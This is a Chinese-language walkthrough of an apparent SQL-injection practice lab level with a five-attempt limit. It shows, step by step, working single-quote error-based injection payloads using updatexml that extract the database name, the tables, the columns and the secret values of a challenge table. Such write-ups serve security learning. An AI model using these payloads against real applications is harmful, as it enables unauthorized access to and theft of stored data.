这一关只有五次机会了 哎怎么办啊 那就只能找出每轮的共同点 这一关肯定不能一轮就完成所有的操作 至少得分个两轮进行操作才可以 前一轮进行注入类型的获取 后一轮进行各种爆破操作 分配好了 首先去判断一下注入类型是否属于数字型注入 输入如下

id=1 and 1=2

回显如下 不属于数字型 

接着输入1' 看看是否属于单引号注入 回显如下 呦 出现报错信息了 从报错信息可以知道这个注入类型属于单引号注入

 佐证一下吧 输入1'--+ 回显如下

可以的那么就是属于单引号注入类型 

我们先试试看联合注入方式吧

输入如下

id=0' union select 1,2,3--+

 看来不能使用联合注入方式 只能使用报错注入了 我们先来将这一轮消费掉再说 下一轮在进行通过报错注入实现各种爆破

基于上一轮判断出来的注入类型 我们将上一关的结论用到这一关上面去 而且这一关我们要使用报错注入

首先进行爆库操作 输入如下

id=0' and updatexml(1,concat(0x7e,database(),0x7e),1)--+

回显如下

 

接着进行报表操作输入如下

id=0' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1)--+

 回显如下

接着进行爆字段操作 输入如下

id=0' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='kiqqd6uxvr'),0x7e),1)--+

 回显如下

最后进行爆用户民和密码操作 输入如下 

id=0' and updatexml(1,concat(0x7e,(select group_concat(sessid,'-',secret_8UZ4) from kiqqd6uxvr),0x7e),1)--+

 回显如下

通关成功！！嗨嗨！！